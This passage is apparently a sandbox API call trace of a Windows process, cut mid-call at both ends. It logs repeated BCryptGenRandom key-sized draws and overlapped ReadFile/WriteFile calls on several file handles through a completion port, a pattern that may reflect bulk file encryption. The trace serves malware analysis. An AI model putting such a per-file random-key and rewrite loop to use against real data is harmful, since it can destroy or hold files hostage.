WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0176.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0176.155] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.155] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.155] free (_Block=0x3e305b8) [0176.155] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.155] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.156] free (_Block=0x1fa91d0) [0176.156] free (_Block=0x1fa2ed8) [0176.156] free (_Block=0x1fa90b8) [0176.156] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.156] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.157] CloseHandle (hObject=0x3cc) returned 1 [0176.157] free (_Block=0x1ff1e60) [0176.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.158] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.161] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.201] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xae1a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.253] CloseHandle (hObject=0x2a4) returned 1 [0176.253] free (_Block=0x3df0008) [0176.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.269] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1075e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0176.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.338] CloseHandle (hObject=0x170) returned 1 [0176.339] free (_Block=0x1ff1e60) [0176.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.365] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.380] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x47a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0176.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.385] CloseHandle (hObject=0x308) returned 1 [0176.385] free (_Block=0x3e70008) [0176.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0176.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0176.397] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.397] free (_Block=0x3e305b8) [0176.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.397] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.397] free (_Block=0x1fa91d0) [0176.397] free (_Block=0x1fa2ed8) [0176.397] free (_Block=0x1fa90b8) [0176.397] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0176.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.410] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xa8b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0176.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.414] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x6ca8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0176.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.580] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0176.591] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0176.591] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.591] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.591] free (_Block=0x3e305b8) [0176.591] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.591] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.592] free (_Block=0x1fa91d0) [0176.592] free (_Block=0x1fa2ed8) [0176.592] free (_Block=0x1fa90b8) [0176.592] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0176.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.602] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0176.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.603] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0176.603] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.603] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.603] free (_Block=0x3e305b8) [0176.603] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.603] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.603] free (_Block=0x1fa91d0) [0176.603] free (_Block=0x1fa2ed8) [0176.603] free (_Block=0x1fa90b8) [0176.603] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0176.604] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.613] CloseHandle (hObject=0x308) returned 1 [0176.613] free (_Block=0x3d70450) [0176.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.624] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2016, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0176.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.648] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x266c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0176.659] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.668] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1fde, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.676] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0176.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0176.677] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.677] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.677] free (_Block=0x3e305b8) [0176.677] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.677] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.678] free (_Block=0x1fa91d0) [0176.678] free (_Block=0x1fa2ed8) [0176.678] free (_Block=0x1fa90b8) [0176.678] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.052] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.061] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.066] CloseHandle (hObject=0x2a8) returned 1 [0177.067] free (_Block=0x3f70048) [0177.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.075] CloseHandle (hObject=0x308) returned 1 [0177.075] free (_Block=0x3e70008) [0177.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.078] CloseHandle (hObject=0x2a4) returned 1 [0177.078] free (_Block=0x3ef0008) [0177.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.079] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.295] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5fec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.313] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x430c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0177.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.328] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x5b70, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0177.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.372] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4b7a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.377] CloseHandle (hObject=0x3cc) returned 1 [0177.378] free (_Block=0x1ff1e60) [0177.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.378] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x12630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.381] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.423] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9680, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.431] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2300, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.473] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.543] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0177.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0177.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.556] BCryptGenRandom (in: hAlgorithm=0x0, 